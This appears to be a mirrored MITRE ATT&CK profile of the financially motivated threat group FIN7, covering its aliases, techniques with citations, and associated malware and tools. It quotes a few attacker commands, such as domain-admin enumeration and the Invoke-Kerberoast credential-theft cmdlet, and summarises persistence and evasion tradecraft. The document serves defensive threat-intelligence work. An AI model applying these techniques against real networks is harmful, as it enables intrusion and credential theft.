Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

FIN7

FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has primarily targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities industries in the U.S. A portion of FIN7 was run out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to a big game hunting (BGH) approach including use of REvil ransomware and their own Ransomware as a Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but there appears to be several groups using Carbanak malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)
ID: G0046
Associated Groups: Carbon Spider, ITG14, Sangria Tempest, GOLD NIAGARA, ELBRUS
Version: 4.0
Created: 31 May 2017
Last Modified: 17 Apr 2024

Associated Group Descriptions

Name Description
Carbon Spider (Citation: CrowdStrike Carbon Spider August 2021)
ITG14 ITG14 shares campaign overlap with FIN7.(Citation: IBM Ransomware Trends September 2020)
Sangria Tempest (Citation: Microsoft Threat Actor Naming July 2023)
GOLD NIAGARA (Citation: Secureworks GOLD NIAGARA Threat Profile)
ELBRUS (Citation: Microsoft Ransomware as a Service)

Techniques Used

Domain ID Name Use
Enterprise T1583 .001 Acquire Infrastructure: Domains

FIN7 has registered look-alike domains for use in phishing campaigns.(Citation: eSentire FIN7 July 2021)

.006 Acquire Infrastructure: Web Services

FIN7 has set up Amazon S3 buckets to host trojanized digital products.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1071 .004 Application Layer Protocol: DNS

FIN7 has performed C2 using DNS via A, OPT, and TXT records.(Citation: FireEye FIN7 Aug 2018)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.(Citation: FireEye FIN7 April 2017)(Citation: FireEye FIN7 Aug 2018)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FBI Flash FIN7 USB)(Citation: Mandiant FIN7 Apr 2022)

.003 Command and Scripting Interpreter: Windows Command Shell

FIN7 used the command prompt to launch commands on the victim’s machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: Mandiant FIN7 Apr 2022)

.005 Command and Scripting Interpreter: Visual Basic

FIN7 used VBS scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: CrowdStrike Carbon Spider August 2021)

.007 Command and Scripting Interpreter: JavaScript

FIN7 used JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

FIN7 created new Windows services and added them to the startup directories for persistence.(Citation: FireEye FIN7 Aug 2018)

Enterprise T1587 .001 Develop Capabilities: Malware

FIN7 has developed malware for use in operations, including the creation of infected removable media.(Citation: FBI Flash FIN7 USB)(Citation: FireEye FIN7 Oct 2019)

Enterprise T1546 .011 Event Triggered Execution: Application Shimming

FIN7 has used application shim databases for persistence.(Citation: FireEye FIN7 Shim Databases)

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

FIN7 has exfiltrated stolen data to the MEGA file sharing site.(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1559 .002 Inter-Process Communication: Dynamic Data Exchange

FIN7 spear phishing campaigns have included malicious Word documents with DDE execution.(Citation: CyberScoop FIN7 Oct 2017)

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

FIN7 has created a scheduled task named “AdobeFlashSync” to establish persistence.(Citation: Morphisec FIN7 June 2017)

.005 Masquerading: Match Legitimate Resource Name or Location

FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)

.016 Obfuscated Files or Information: Junk Code Insertion

FIN7 has used random junk code to obfuscate malware code.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1588 .002 Obtain Capabilities: Tool

FIN7 has utilized a variety of tools such as Cobalt Strike, PowerSploit, and the remote management tool, Atera for targeting efforts.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1069 .002 Permission Groups Discovery: Domain Groups

FIN7 has used the command `net group "domain admins" /domain` to enumerate domain groups.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.(Citation: FireEye FIN7 April 2017)(Citation: DOJ FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)

.002 Phishing: Spearphishing Link

FIN7 has conducted broad phishing campaigns using malicious links.(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

FIN7 has used RDP to move laterally in victim environments.(Citation: CrowdStrike Carbon Spider August 2021)

.004 Remote Services: SSH

FIN7 has used SSH to move laterally through victim environments.(Citation: CrowdStrike Carbon Spider August 2021)

.005 Remote Services: VNC

FIN7 has used TightVNC to control compromised hosts.(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

FIN7 malware has created scheduled tasks to establish persistence.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)

Enterprise T1608 .001 Stage Capabilities: Upload Malware

FIN7 has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.(Citation: Mandiant FIN7 Apr 2022)

.004 Stage Capabilities: Drive-by Target

FIN7 has compromised a digital product website and modified multiple download links to point to trojanized versions of offered digital products.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1558 .003 Steal or Forge Kerberos Tickets: Kerberoasting

FIN7 has used Kerberoasting PowerShell commands such as, `Invoke-Kerberoast` for credential access and to enable lateral movement.(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)

Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

FIN7 has gained initial access by compromising a victim's software supply chain.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.(Citation: FireEye FIN7 April 2017)

.011 System Binary Proxy Execution: Rundll32

FIN7 has used `rundll32.exe` to execute malware on a compromised network.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1204 .001 User Execution: Malicious Link

FIN7 has used malicious links to lure victims into downloading malware.(Citation: CrowdStrike Carbon Spider August 2021)

.002 User Execution: Malicious File

FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.(Citation: FireEye FIN7 April 2017)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1078 .003 Valid Accounts: Local Accounts

FIN7 has used compromised credentials for access as SYSTEM on Exchange servers.(Citation: Microsoft Ransomware as a Service)

Enterprise T1497 .002 Virtualization/Sandbox Evasion: User Activity Based Checks

FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.(Citation: FireEye FIN7 April 2017)

Enterprise T1102 .002 Web Service: Bidirectional Communication

FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.(Citation: FireEye FIN7 Aug 2018)

Software

ID Name References Techniques
S0417 GRIFFON (Citation: CrowdStrike Carbon Spider August 2021) (Citation: FBI Flash FIN7 USB) (Citation: Microsoft Ransomware as a Service) (Citation: SecureList Griffon May 2019) Scheduled Task, Screen Capture, JavaScript, Domain Groups, System Information Discovery, PowerShell, Registry Run Keys / Startup Folder, System Time Discovery
S0416 RDFSNIFFER (Citation: FireEye FIN7 Oct 2019) Native API, File Deletion, Credential API Hooking
S0151 HALFBAKED (Citation: FireEye FIN7 April 2017) (Citation: FireEye FIN7 Aug 2018) Windows Management Instrumentation, Screen Capture, System Information Discovery, Process Discovery, PowerShell, File Deletion
S0194 PowerSploit (Citation: CrowdStrike Carbon Spider August 2021) (Citation: GitHub PowerSploit May 2012) (Citation: Mandiant FIN7 Apr 2022) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation) Scheduled Task, Windows Management Instrumentation, Screen Capture, Keylogging, Path Interception by PATH Environment Variable, Audio Capture, Local Account, Windows Service, DLL, Credentials in Registry, Data from Local System, Reflective Code Loading, Security Support Provider, Path Interception by Search Order Hijacking, LSASS Memory, Domain Trust Discovery, Group Policy Preferences, Process Discovery, PowerShell, Registry Run Keys / Startup Folder, Indicator Removal from Tools, Path Interception by Unquoted Path, Query Registry, Path Interception, Windows Credential Manager, Command Obfuscation, Access Token Manipulation, Kerberoasting, Dynamic-link Library Injection
S0145 POWERSOURCE (Citation: Cisco DNSMessenger March 2017) (Citation: DNSMessenger) (Citation: FireEye FIN7 March 2017) DNS, PowerShell, Registry Run Keys / Startup Folder, Query Registry, Ingress Tool Transfer, NTFS File Attributes
S0146 TEXTMATE (Citation: Cisco DNSMessenger March 2017) (Citation: DNSMessenger) (Citation: FireEye FIN7 March 2017) DNS, Windows Command Shell
S0415 BOOSTWRITE (Citation: FireEye FIN7 Oct 2019) Shared Modules, Encrypted/Encoded File, DLL, Code Signing, Deobfuscate/Decode Files or Information
S0030 Carbanak (Citation: Anunak) (Citation: CrowdStrike Carbon Spider August 2021) (Citation: DOJ FIN7 Aug 2018) (Citation: FBI Flash FIN7 USB) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018) (Citation: FireEye FIN7 March 2017) (Citation: Fox-It Anunak Feb 2015) (Citation: IBM Ransomware Trends September 2020) (Citation: Kaspersky Carbanak) (Citation: Mandiant FIN7 Apr 2022) Screen Capture, Standard Encoding, Keylogging, OS Credential Dumping, Local Email Collection, Symmetric Cryptography, Remote Access Tools, Local Account, Portable Executable Injection, Process Discovery, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Query Registry, Data Transfer Size Limits, Windows Command Shell, File Deletion, Web Protocols, Remote Desktop Protocol, Custom Command and Control Protocol, Commonly Used Port
S0390 SQLRat (Citation: Flashpoint FIN 7 March 2019) Scheduled Task, Malicious File, Deobfuscate/Decode Files or Information, PowerShell, Windows Command Shell, Command Obfuscation, File Deletion, Ingress Tool Transfer
S0154 Cobalt Strike (Citation: CrowdStrike Carbon Spider August 2021) (Citation: FBI Flash FIN7 USB) (Citation: Mandiant FIN7 Apr 2022) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0496 REvil (Citation: CrowdStrike Carbon Spider August 2021) (Citation: Cylance Sodinokibi July 2019) (Citation: FBI Flash FIN7 USB) (Citation: G Data Sodinokibi June 2019) (Citation: Group IB Ransomware May 2020) (Citation: IBM Ransomware Trends September 2020) (Citation: Intel 471 REvil March 2020) (Citation: Kaspersky Sodin July 2019) (Citation: McAfee REvil October 2019) (Citation: McAfee Sodinokibi October 2019) (Citation: Microsoft Ransomware as a Service) (Citation: Picus Sodinokibi January 2020) (Citation: Secureworks GandCrab and REvil September 2019) (Citation: Secureworks REvil September 2019) (Citation: Sodin) (Citation: Sodinokibi) (Citation: Talos Sodinokibi April 2019) (Citation: Tetra Defense Sodinokibi March 2020) Windows Management Instrumentation, Fileless Storage, Encrypted/Encoded File, Match Legitimate Resource Name or Location, Service Stop, Malicious File, Safe Mode Boot, Domain Groups, Spearphishing Attachment, System Service Discovery, System Information Discovery, Native API, Deobfuscate/Decode Files or Information, Process Injection, Mutual Exclusion, Modify Registry, Create Process with Token, File and Directory Discovery, Token Impersonation/Theft, Exfiltration Over C2 Channel, PowerShell, Disable or Modify Tools, Data Encrypted for Impact, Asymmetric Cryptography, System Language Discovery, Query Registry, Windows Command Shell, Data Destruction, File Deletion, Drive-by Compromise, Web Protocols, Visual Basic, Ingress Tool Transfer, Inhibit System Recovery
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: CrowdStrike Carbon Spider August 2021) (Citation: Deply Mimikatz) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0517 Pillowmint (Citation: CrowdStrike Carbon Spider August 2021) (Citation: Trustwave Pillowmint June 2020) Fileless Storage, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Application Shimming, Archive Collected Data, Modify Registry, Indicator Removal, Asynchronous Procedure Call, Process Discovery, PowerShell, Obfuscated Files or Information, Query Registry, Clear Persistence, File Deletion, Compression
S0488 CrackMapExec (Citation: CME Github September 2018) (Citation: CrowdStrike Carbon Spider August 2021) Windows Management Instrumentation, Password Guessing, Security Account Manager, LSA Secrets, Domain Account, Domain Groups, Network Share Discovery, System Information Discovery, Modify Registry, Password Spraying, System Network Configuration Discovery, File and Directory Discovery, System Network Connections Discovery, PowerShell, Brute Force, Password Policy Discovery, Remote System Discovery, Pass the Hash, NTDS, At
S0449 Maze (Citation: FireEye Maze May 2020) (Citation: McAfee Maze March 2020) (Citation: Microsoft Ransomware as a Service) (Citation: Sophos Maze VM September 2020) Scheduled Task, Windows Management Instrumentation, Service Stop, System Information Discovery, Msiexec, Native API, Junk Code Insertion, Indicator Removal, Dynamic Resolution, Masquerade Task or Service, System Network Connections Discovery, Process Discovery, Registry Run Keys / Startup Folder, Disable or Modify Tools, Obfuscated Files or Information, Run Virtual Instance, Data Encrypted for Impact, System Language Discovery, Windows Command Shell, Web Protocols, Dynamic-link Library Injection, Inhibit System Recovery, System Shutdown/Reboot
S0648 JSS Loader (Citation: CrowdStrike Carbon Spider August 2021) (Citation: Microsoft Ransomware as a Service) (Citation: eSentire FIN7 July 2021) Scheduled Task, JavaScript, Malicious File, Spearphishing Attachment, PowerShell, Visual Basic, Ingress Tool Transfer
S0552 AdFind (Citation: CrowdStrike Carbon Spider August 2021) (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019) (Citation: Red Canary Hospital Thwarted Ryuk October 2020) Domain Account, Domain Groups, System Network Configuration Discovery, Domain Trust Discovery, Remote System Discovery
S0681 Lizar (Citation: BiZone Lizar May 2021) (Citation: Gemini FIN7 Oct 2021) (Citation: Threatpost Lizar May 2021) (Citation: Tirion) Screen Capture, System Owner/User Discovery, System Information Discovery, Native API, Deobfuscate/Decode Files or Information, Process Injection, Email Account, Archive Collected Data, Credentials from Web Browsers, Browser Information Discovery, LSASS Memory, System Network Configuration Discovery, System Network Connections Discovery, Portable Executable Injection, Process Discovery, PowerShell, Encrypted Channel, Security Software Discovery, Windows Command Shell, Windows Credential Manager, Ingress Tool Transfer, Dynamic-link Library Injection

References

  1. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
  2. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  3. Waterman, S. (2017, October 16). Fin7 weaponization of DDE is just their latest slick move, say researchers. Retrieved November 21, 2017.
  4. The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.
  5. Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.
  6. Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.
  7. CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.
  8. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  9. Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.
  10. eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels’ Owner, Brown-Forman Inc.. Retrieved September 20, 2021.
  11. Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
  12. Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.
  13. Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.
  14. Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.
  15. Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.
  16. Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques. Retrieved October 11, 2019.
  17. Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.
  18. Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.
  19. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  20. Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.
  21. Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.